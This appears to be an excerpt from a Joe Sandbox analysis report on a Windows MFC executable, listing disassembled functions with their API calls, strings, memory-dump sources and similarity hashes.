Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 7c42486130693ded2b0d9908c3d08e2c0dbada9dfd0c1f9ad2efcd502e1fa9bc
Instruction ID: 9c843af1a0861507d30a51251d48791bd3b6ff6ceb89dea048ca65945bd0d6ca
Opcode Fuzzy Hash: 7c42486130693ded2b0d9908c3d08e2c0dbada9dfd0c1f9ad2efcd502e1fa9bc
Instruction Fuzzy Hash: 4DE0D8312093609BD312CE1C9840FA7F790AB5DB10F0044AEF581B7191C2305C41C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 004028FE, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1576.MFC42(004028A0,004028A0,004028A0,004028A0,004028A0,00000000,?,0000000A), ref: 0040290E

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction ID: 938215fdd3e634f6bfb0a4fab6d9080def83c43837c2a94a768619a28cf0a1dc
Opcode Fuzzy Hash: 371cf650558777b7497c1cc85ae61873b6a5021e63d3067b0ccf166c38b5e6e7
Instruction Fuzzy Hash: 8BB00876518397ABCB02EE91890592ABAA6BB98304F484C1DB2A1100A587768429FB16

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401A57, Relevance: 13.6, APIs: 9, Instructions: 63windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00401A63
#470.MFC42 ref: 00401A73
SendMessageA.USER32 ref: 00401A8A
GetSystemMetrics.USER32 ref: 00401A98
GetSystemMetrics.USER32 ref: 00401A9E
GetClientRect.USER32 ref: 00401AA9
DrawIcon.USER32 ref: 00401AD6
#755.MFC42 ref: 00401ADF
#2379.MFC42 ref: 00401AEA

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1397574227-0
Opcode ID: b5050d70c34d388316e9cb320daa54272746495e68a914dbfbc863fb065d247e
Instruction ID: 6c92bf739a647b1972c25edd5a1750e6554c8e82d2b5e7f998f32acc8b1b98e6
Opcode Fuzzy Hash: b5050d70c34d388316e9cb320daa54272746495e68a914dbfbc863fb065d247e
Instruction Fuzzy Hash: 46114F72610219AFDB00AFB8DE49DAE7BBEEB44301F040579F546E71E0DA74E904CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00240350, Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

CryptAcquireContextA, xrefs: 00240353

Memory Dump Source

Source File: 00000011.00000002.55332525789.0000000000240000.00000040.00000001.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_240000_231824723.jbxd

Similarity

API ID:
String ID: CryptAcquireContextA
API String ID: 0-2822909605
Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595

Uniqueness

Uniqueness Score: -1.00%

Function 002F0467, Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.55332549540.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2f0000_231824723.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction ID: 8272cd9a7684c6a758a0ecc828b070025b4369bc9380e4345cc14f929eddb93e
Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
Instruction Fuzzy Hash: 6B319C36A1434A8FC710DF18D4C0A2AF7E4FF88344B4A09ADEA9587312D370E9268B91

Uniqueness

Uniqueness Score: -1.00%

Function 004010DA, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2be6f62b562e5c4429d975791db73d9bf36d8a73ddeea1106ffbb7eec89d0a3
Instruction ID: b4b312fe3a0bf3500f56ba9c68af6614ef01e88f3f64379312b6b6f37a325d42
Opcode Fuzzy Hash: c2be6f62b562e5c4429d975791db73d9bf36d8a73ddeea1106ffbb7eec89d0a3
Instruction Fuzzy Hash: 61B09270A1668DEBCB01CB9DE641A49B7FCE708A88F1000A8E409E3700D274EF009A54

Uniqueness

Uniqueness Score: -1.00%

Function 00401767, Relevance: 70.2, APIs: 24, Strings: 16, Instructions: 204
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040176C
#4710.MFC42 ref: 00401779
GetSystemMenu.USER32 ref: 00401784
#2863.MFC42(00000000), ref: 0040178B
#540.MFC42(00000000), ref: 00401799
#4160.MFC42(00000065,00000000), ref: 004017A6
AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 004017C3
AppendMenuA.USER32(?,00000000,00000010,?), ref: 004017CF
#800.MFC42(00000065,00000000), ref: 004017D8
SendMessageA.USER32 ref: 004017F4
SendMessageA.USER32 ref: 00401802
#1168.MFC42 ref: 00401808
#1146.MFC42(00000084,0000000E,00000084), ref: 00401816
LoadIconA.USER32 ref: 00401822
DestroyIcon.USER32(?,00000000), ref: 00401838
#1168.MFC42 ref: 0040183E
#1146.MFC42(00000086,0000000E,00000086), ref: 0040184C
LoadIconA.USER32 ref: 00401852
DestroyIcon.USER32(?,00000000), ref: 00401865
#1168.MFC42 ref: 0040186B
#1146.MFC42(00000085,0000000E,00000085), ref: 00401879
LoadIconA.USER32 ref: 0040187F
DestroyIcon.USER32(00000000,00000000), ref: 0040188F
SendMessageA.USER32 ref: 004019F0

Strings

Root 4, xrefs: 00401943
Root 3 2nd level child, xrefs: 004019C1
Root 3 1st level child's 1st level child, xrefs: 0040198A
Root 3 3rd level child, xrefs: 004019D1
Root 1 1st level child, xrefs: 004018EB
Root 4 2nd level child, xrefs: 0040196A
Root 1 2nd level child, xrefs: 004018FD
Root 4 1st level child, xrefs: 00401959
Root 3 1st level child's 3rd level child, xrefs: 004019AF
Root 1 3rd level child, xrefs: 0040190F
Root 3 1st level child, xrefs: 0040197A
Root 1, xrefs: 00401895
Root 1 4th level child, xrefs: 00401921
Root 3, xrefs: 00401933
Root 2, xrefs: 004018D8
Root 3 1st level child's 2nd level child, xrefs: 0040199D

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Icon$#1146#1168DestroyLoadMenuMessageSend$Append$#2863#4160#4710#540#800H_prologSystem
String ID: Root 1$Root 1 1st level child$Root 1 2nd level child$Root 1 3rd level child$Root 1 4th level child$Root 2$Root 3$Root 3 1st level child$Root 3 1st level child's 1st level child$Root 3 1st level child's 2nd level child$Root 3 1st level child's 3rd level child$Root 3 2nd level child$Root 3 3rd level child$Root 4$Root 4 1st level child$Root 4 2nd level child
API String ID: 2014748477-2074257982
Opcode ID: 76561af6e66c6c8cdef270ad34e90add63ba8afe98c36df34aa416e1bc5bcb7f
Instruction ID: eb79eba728e17d5ed5a69d75820a2d0973927f36d676c535e8bc1daa52409dd7
Opcode Fuzzy Hash: 76561af6e66c6c8cdef270ad34e90add63ba8afe98c36df34aa416e1bc5bcb7f
Instruction Fuzzy Hash: B4611E70A00709ABDF116BA1CD4AFAFBE7AEF88704F14442EF501762F1DBB959009B58

Uniqueness

Uniqueness Score: -1.00%

Function 004021DB, Relevance: 45.2, APIs: 30, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClientRect.USER32 ref: 004021F0
GetDC.USER32(?), ref: 004021F9
#2859.MFC42(00000000), ref: 00402200
#2567.MFC42(?,?,?,00000000), ref: 00402213
InflateRect.USER32(?,000000FF,000000FF), ref: 00402226
#4123.MFC42 ref: 0040222A
GetSysColor.USER32 ref: 0040223B
GetSysColor.USER32 ref: 0040224A
GetSysColor.USER32 ref: 0040224F
#2567.MFC42(?,00000000), ref: 00402258
InflateRect.USER32(?,000000FF,000000FF), ref: 00402265
GetSystemMetrics.USER32 ref: 00402269
GetSysColor.USER32 ref: 00402279
GetSysColor.USER32 ref: 0040227E
#2567.MFC42(?,00000000), ref: 00402287
InflateRect.USER32(?,000000FF,000000FF), ref: 00402294
GetSysColor.USER32 ref: 00402298
GetSysColor.USER32 ref: 0040229D
#2567.MFC42(?,00000000), ref: 004022A6
#4123.MFC42(?,00000000), ref: 004022AE
OffsetRect.USER32 ref: 004022D2
GetSysColor.USER32 ref: 004022DA
GetSysColor.USER32 ref: 004022E9
GetSysColor.USER32 ref: 00402314
#2567.MFC42(00000000,00000000), ref: 0040231D
ReleaseDC.USER32(?,?), ref: 0040232B

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Color$#2567Rect$Inflate$#4123$#2859ClientMetricsOffsetReleaseSystem
String ID:
API String ID: 3574349519-0
Opcode ID: 7cbfe6d1f3f536a8cac1869bb7a83b24eb0af64d2d314227414d6713dca6bb43
Instruction ID: fb77aa9778783f10f3bfbe6a76275cffd50fd6737c3accfdcbb4984c63bf03aa
Opcode Fuzzy Hash: 7cbfe6d1f3f536a8cac1869bb7a83b24eb0af64d2d314227414d6713dca6bb43
Instruction Fuzzy Hash: 3C418F71A00119BBDF10ABE1CE49EBF7E7CFB44760F10057ABA15B61D1DAB48A00AB75

Uniqueness

Uniqueness Score: -1.00%

Function 0040111F, Relevance: 37.7, APIs: 25, Instructions: 177
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00401154
SendMessageA.USER32 ref: 0040115C
SendMessageA.USER32 ref: 00401164
SendMessageA.USER32 ref: 0040116C
SendMessageA.USER32 ref: 00401174
SendMessageA.USER32 ref: 0040117C
SendMessageA.USER32 ref: 00401184
SendMessageA.USER32 ref: 0040118C
SendMessageA.USER32 ref: 00401194
SendMessageA.USER32 ref: 0040119C
SendMessageA.USER32 ref: 004011A4
SendMessageA.USER32 ref: 004011AC
SendMessageA.USER32 ref: 004011B4
SendMessageA.USER32 ref: 004011BC
SendMessageA.USER32 ref: 004011C4
SendMessageA.USER32 ref: 004011CC
SendMessageA.USER32 ref: 004011D4
SendMessageA.USER32 ref: 004011DC
SendMessageA.USER32 ref: 004011E4
SendMessageA.USER32 ref: 004011EC
SendMessageA.USER32 ref: 004011F4
SendMessageA.USER32 ref: 004011FC
SendMessageA.USER32 ref: 00401204
SendMessageA.USER32 ref: 0040120C
strcmp.MSVCRT ref: 00401235

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: MessageSend$strcmp
String ID:
API String ID: 1026492426-0
Opcode ID: bdca4a18467a09fec4bb6cf044decc485a7405438a9a3022ba9d02e32459d345
Instruction ID: 6eed106d71de69c99f0400bd9a7b8a33876bfe5d1c24387f7ab3a6ec800dad13
Opcode Fuzzy Hash: bdca4a18467a09fec4bb6cf044decc485a7405438a9a3022ba9d02e32459d345
Instruction Fuzzy Hash: 434102A57843187FF1315A27DC96F1B7E9CDB45BA8F12181AB3057A1C2D9F6E60089F0

Uniqueness

Uniqueness Score: -1.00%

Function 00401CE6, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 158
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00401CEB
#2859.MFC42(?,00000000,?,00000001), ref: 00401CFE
SendMessageA.USER32 ref: 00401D13
CopyRect.USER32(?,?), ref: 00401D24
ImageList_GetImageCount.COMCTL32(?), ref: 00401D30
ImageList_Draw.COMCTL32(?,?,?,?,?,00000001), ref: 00401D9A
#3920.MFC42(00000000,00000000,00000001,00000000), ref: 00401DAF
#2567.MFC42(00000000,008080FF,00FF0000,00000000,00000000,00000001,00000000), ref: 00401DC4
#537.MFC42(004053F0), ref: 00401DDA
#3317.MFC42(?,?,004053F0), ref: 00401DF2
#2754.MFC42(?,?,004053F0), ref: 00401E06
#472.MFC42(00000000,00000001,?,?,?,004053F0), ref: 00401E15
#5788.MFC42(?,00000000,00000001,?,?,?,004053F0), ref: 00401E24
Rectangle.GDI32(?,?,?,00000000,?), ref: 00401E43
#5788.MFC42(00000000), ref: 00401E4C
#2414.MFC42(00000000), ref: 00401E54
#2414.MFC42(00000000), ref: 00401E67
#2380.MFC42(00000003,00000001,00000002,00000001,004053F0), ref: 00401E82
#800.MFC42 ref: 00401EA3

Strings

(8@, xrefs: 00401E60

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Image$#2414#5788List_$#2380#2567#2754#2859#3317#3920#472#537#800CopyCountDrawH_prologMessageRectRectangleSend
String ID: (8@
API String ID: 1559282378-2824614689
Opcode ID: 44c095e605719bc4b6f77e11b94b5d33d0ce0a2cd3f19f19b0373bb3e86b997b
Instruction ID: e688b3058943d2db0ee3cd47aa1a08d6f4277226d546720439443fc76aa8dd67
Opcode Fuzzy Hash: 44c095e605719bc4b6f77e11b94b5d33d0ce0a2cd3f19f19b0373bb3e86b997b
Instruction Fuzzy Hash: 0A517E71A00209AFDF14DF95C949AEEBBB9FF08304F10856AF501B62D1CBB5AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00401C1A, Relevance: 22.6, APIs: 15, Instructions: 96windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004020C1
SendMessageA.USER32 ref: 004020E0
#540.MFC42 ref: 004020EB
GetDC.USER32(?), ref: 004020F6
#2859.MFC42(00000000), ref: 004020FD
GetSystemMetrics.USER32 ref: 00402106
#3317.MFC42(00000000,?), ref: 00402122
SendMessageA.USER32 ref: 00402134
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 00402148
#537.MFC42(00405310), ref: 0040217D
GetTextExtentPoint32A.GDI32(?,00000000,?,?), ref: 00402191
#800.MFC42 ref: 004021A0
ReleaseDC.USER32(?,?), ref: 004021AB
SendMessageA.USER32 ref: 004021BE
#800.MFC42 ref: 004021C7

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: MessageSend$#800ExtentPoint32Text$#2859#3317#537#540H_prologMetricsReleaseSystem
String ID:
API String ID: 1589404001-0
Opcode ID: 728f1d90b333337ff640fdf8344964e7e0982b949069d6a70da423a0ec078cfc
Instruction ID: 448610b032a2211a25e3202d758c6bc1ea8e792e9bde118c1bae8b5813ab2c6a
Opcode Fuzzy Hash: 728f1d90b333337ff640fdf8344964e7e0982b949069d6a70da423a0ec078cfc
Instruction Fuzzy Hash: 3A414B71900209AFCF10DFA4CD49AAEBBB9FF48304F00442AE511B62E1D7756E01CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00401C1F, Relevance: 13.6, APIs: 9, Instructions: 77COMMON

Download Yara Rule

APIs

#2859.MFC42(?), ref: 00401C36
#4123.MFC42(?), ref: 00401C3F
#2754.MFC42(?,00C0C0C0,?), ref: 00401C53
#5875.MFC42(00000001,?,00C0C0C0,?), ref: 00401C5C
GetSysColor.USER32 ref: 00401C65
#2754.MFC42(?,?,?), ref: 00401C8A
#5875.MFC42(00000001,?,?,?), ref: 00401C92
#2754.MFC42(?,?,?), ref: 00401CBE
#5875.MFC42(00000001,?,?,?), ref: 00401CC6

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: #2754#5875$#2859#4123Color
String ID:
API String ID: 1910319054-0
Opcode ID: 4fd04bfc78a80922ebe0a380fa3382f68872101838d1a64f3889dbabb215a338
Instruction ID: b4d0aa36d687d76150ef3c32aeb2c73d61d5d3b3d0006c97c5da1615f5e26509
Opcode Fuzzy Hash: 4fd04bfc78a80922ebe0a380fa3382f68872101838d1a64f3889dbabb215a338
Instruction Fuzzy Hash: B921C8313442445BDA266B568998F3E77DA6F84308F04043FF803A32E1DBBEDC459B18

Uniqueness

Uniqueness Score: -1.00%

Function 00401B11, Relevance: 12.0, APIs: 8, Instructions: 45COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401B16
#567.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B24
#384.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B38
GetSysColor.USER32 ref: 00401B4F
GetSysColor.USER32 ref: 00401B56
GetSysColor.USER32 ref: 00401B5D
GetSysColor.USER32 ref: 00401B64
#2096.MFC42(00000010,00000010,00000009,00000002,00000001,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B79

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Color$#2096#384#567H_prolog
String ID:
API String ID: 4170207429-0
Opcode ID: caedbeffb5df5d99fd3dff073ee88d8126bacf6db02d36935cb0ff4101d82348
Instruction ID: 552dbbc5a8b14f0679882fb9a0c06257b098a61b55743734ca476e3c02aee2c0
Opcode Fuzzy Hash: caedbeffb5df5d99fd3dff073ee88d8126bacf6db02d36935cb0ff4101d82348
Instruction Fuzzy Hash: E2017571B40754ABD720AF66894AB5ABBA4FB80705F004C3EE2416B6C1DBFAA5448B54

Uniqueness

Uniqueness Score: -1.00%

Function 00401F25, Relevance: 10.6, APIs: 7, Instructions: 77windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00401F48
#823.MFC42(00000006), ref: 00401F4E
SendMessageA.USER32 ref: 00401F71
SendMessageA.USER32 ref: 00401F95
SendMessageA.USER32 ref: 00401FB8
#823.MFC42(00000006), ref: 00401FBF
SendMessageA.USER32 ref: 00401FEB

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: MessageSend$#823
String ID:
API String ID: 3019263841-0
Opcode ID: f9e0009e9dc80343820839db8562cd4116cce26f4e51f59be65ee9b692f6ba3f
Instruction ID: 486407449269acd2580107f9ecc8b0b56822c8540115cb24ae73aa22315cd849
Opcode Fuzzy Hash: f9e0009e9dc80343820839db8562cd4116cce26f4e51f59be65ee9b692f6ba3f
Instruction Fuzzy Hash: B1218132104244BBDB016F64DC49EA6BBA9FF58700F16C069F9489F2F2E6B1D900C764

Uniqueness

Uniqueness Score: -1.00%

Function 004016C8, Relevance: 7.5, APIs: 5, Instructions: 29windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004016CD
#324.MFC42(00000066,?,?,?,0040160A,00000000), ref: 004016DE

Part of subcall function 00401B11: _EH_prolog.MSVCRT ref: 00401B16
Part of subcall function 00401B11: #567.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B24
Part of subcall function 00401B11: #384.MFC42(00000000,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B38
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B4F
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B56
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B5D
Part of subcall function 00401B11: GetSysColor.USER32 ref: 00401B64
Part of subcall function 00401B11: #2096.MFC42(00000010,00000010,00000009,00000002,00000001,?,00000000,?,004016EF,00000066,?,?,?,0040160A,00000000), ref: 00401B79

#1168.MFC42(00000066,?,?,?,0040160A,00000000), ref: 004016F9
#1146.MFC42(00000080,0000000E,00000080,00000066,?,?,?,0040160A,00000000), ref: 00401707
LoadIconA.USER32 ref: 0040170D

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Color$H_prolog$#1146#1168#2096#324#384#567IconLoad
String ID:
API String ID: 1570525922-0
Opcode ID: 14627a97b2c76580237a4e20db6eb5b5e94a4411785cf4c2c5d9dbe4e56fc2a2
Instruction ID: 792c10b5caf4369139866adca4fd7813d2dac80267ebf69f26e15c7ab92fc860
Opcode Fuzzy Hash: 14627a97b2c76580237a4e20db6eb5b5e94a4411785cf4c2c5d9dbe4e56fc2a2
Instruction Fuzzy Hash: ECF089B1A00214ABD710AFA5CA0DB9EBAA8EB54304F00493FB441B32C1DBFD6A00C768

Uniqueness

Uniqueness Score: -1.00%

Function 0040235D, Relevance: 7.5, APIs: 5, Instructions: 20COMMON

Download Yara Rule

APIs

#5053.MFC42 ref: 00402361
GetSysColor.USER32 ref: 0040236E
GetSysColor.USER32 ref: 00402375
GetSysColor.USER32 ref: 0040237C
GetSysColor.USER32 ref: 00402383

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: Color$#5053
String ID:
API String ID: 680119309-0
Opcode ID: c2cd13360962db9f81c619f9e63e46b75756325e0134da5e99e72c84742973f4
Instruction ID: 9fd4b0b0de83cb852c2de9fcfa50de6b5b46a78d6896a43a0ae3c146f96b08fd
Opcode Fuzzy Hash: c2cd13360962db9f81c619f9e63e46b75756325e0134da5e99e72c84742973f4
Instruction Fuzzy Hash: 80D0EC719507945AD7307BB79C09B0BAEE8EFC1710F02086FE241AB590DAF5D4048F50

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB7, Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401BBC
#2408.MFC42(00000000,?,?,00401633,00000000), ref: 00401BE5
#686.MFC42(00000000,?,?,00401633,00000000), ref: 00401BF0
#616.MFC42(00000000,?,?,00401633,00000000), ref: 00401BFB

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332742872.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.55332753088.0000000000406000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_231824723.jbxd

Similarity

API ID: #2408#616#686H_prolog
String ID:
API String ID: 2448546154-0
Opcode ID: 60e1a6c81dd0e97c4d00e14183edcab5b5207045b989df9bf9a8cc595a335061
Instruction ID: 8071e36fa14699001fbb46182fecce067d7882a0a2dd38a65229a8ff903abceb
Opcode Fuzzy Hash: 60e1a6c81dd0e97c4d00e14183edcab5b5207045b989df9bf9a8cc595a335061
Instruction Fuzzy Hash: E7F08271A01661A7DB25AB69821939EBBB5AF80718F00453FE411773D0CBFD5E01CA88

Uniqueness

Uniqueness Score: -1.00%

Function 00401A08, Relevance: 6.0, APIs: 4, Instructions: 21COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401A0D
#2379.MFC42 ref: 00401A44

Part of subcall function 00401688: #324.MFC42(00000064,00000000), ref: 0040168F

#2514.MFC42 ref: 00401A31
#641.MFC42 ref: 00401A3D

Memory Dump Source

Source File: 00000011.00000002.55332719363.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.55332708280.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.55332731673.0000000000403000.00000002.00020000.sdmp Download File
